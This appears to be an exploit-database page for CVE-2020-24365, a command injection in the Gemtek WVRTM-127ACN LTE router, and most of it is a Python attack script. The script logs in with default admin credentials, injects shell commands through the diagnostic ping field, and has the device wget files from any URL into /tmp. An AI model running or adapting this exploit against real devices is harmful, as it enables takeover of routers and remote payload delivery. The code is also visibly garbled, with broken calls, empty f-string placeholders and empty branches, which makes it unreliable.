Gemtek WVRTM-127ACN Exploit, Authenticated Arbitrary Command Injection

# Exploit Title: Gemtek WVRTM-127ACN - Authenticated Arbitrary Command Injection 
# Date: 13/09/2020                                         
# Exploit Author: Gabriele Zuddas                         
# Version:,                      
# CVE : CVE-2020-24365                                     

Service Provider : 	Linkem
Product Name : 	LTE CPE
Model ID : 	WVRTM-127ACN
Serial ID :	GMK170418011089
Firmware Version :
Firmware Creation Date : 	May 15 13:04:30 CST 2019
Bootrom Version : 	U-Boot 1.1.3
Bootrom Creation Date : 	Oct 23 2015 - 16:03:05
LTE Support Band : 	42,43

Injecting happens here:

sh -c (ping -4 -c 1 -s 4 -W 1 "INJECTION" > /tmp/mon_diag.log 2>&1; cmscfg -s -n mon_diag_status -v 0)&

Exploit has been tested on older verions too:
    Firmware Version:
    Firmware Creation Date : 	May 23 15:34:10 CST 2018


import requests, time, argparse, re, sys

class Exploit():
    CVE = "CVE-2020-24365"
    def __init__(self, args):
        self.args = args
        self.session = requests.Session()
    def login(self):
        s = self.session
        r ="http://{}/cgi-bin/sysconf.cgi?page=login.asp&action=login", data={"user_name":self.args.username,"user_passwd":self.args.password})
        if "sid" not in s.cookies:
            print("[!] Login failed.")
        sid = s.cookies["sid"]
        s.headers = {"sid": sid}
        print(f"[*] Login successful! (sid={sid})")
    def now(self):
        return int(time.time() * 1000)

    def exploit(self, command):
        with self.session as s:
            payload = f"http://{}/cgi-bin/sysconf.cgi?page=ajax.asp&action=save_monitor_diagnostic&mon_diag_type=0&mon_diag_addr=$({command};)&mon_ping_num=1&mon_ping_size=4&mon_ping_timeout=1&mon_tracert_hops=&mon_diag_protocol_type=4&time={}&_={}"
            r = s.get(payload)
            r = s.get(f"http://{}/cgi-bin/sysconf.cgi?page=ajax.asp&action=diagnostic_tools_start¬run=1&time={}&_={}")
            content = str(r.content, "utf8")

            #Attempt to stop the command as some commands tend to get stuck (if commands stop working check on the web interface)
            r = s.get(payload)
            r = s.get(f"http://{}/cgi-bin/sysconf.cgi?page=ajax.asp&action=diagnostic_tools_start¬run=1&time={}&_={}")
            content = str(r.content, "utf8")
            #TODO: eventually parse content with regex to clean out the output
            c = re.findall(r"(?<=ping: bad address \')(.*)(?=\')", content)
            if len(c) > 0:
                return c[0]
                return False

    def download_file(self, url):
        filename = url.rsplit('/', 1)[-1]
        if self.args.file is not None:
            print(f"[*] Attempting download of file '{filename}' from {url} ...")
            if self.exploit(f"wget {url} -O /tmp/{filename}"):
                print(f"[*] File saved on {}'s /tmp/{filename}.")
                print(self.exploit(f"du -h /tmp/{filename}"))
                return True
                print(f"[!] Failed to download {filename} from {url}")
                return False

    def run(self):
        if self.args.command is not None:
        if self.args.file is not None:

if __name__ == "__main__":
    # Create the parser and add arguments
    parser = argparse.ArgumentParser()
    parser.add_argument("-t", "--target", dest="target", default="", help="Vulnerable target")
    parser.add_argument("-u", "--username", dest="username", default="admin", help="Valid username to use")
    parser.add_argument("-p", "--password", dest="password", default="admin", help="Valid password to use")
    parser.add_argument("-c", "--command", dest="command", default=None, help="Command to execute")
    parser.add_argument("-D", "--download-file", dest="file", default=None, help="Download file on target's /tmp directory")

    args = parser.parse_args()

    # Run exploit
    X = Exploit(args)
    if len(sys.argv) > 1:
        print(f"[*] Exploiting {X.CVE} ...")

All rights reserved 2009 - 2020
Powered by: MVCP 2.0-RC / ASPF / PHP 7.4 / NGINX / FreeBSD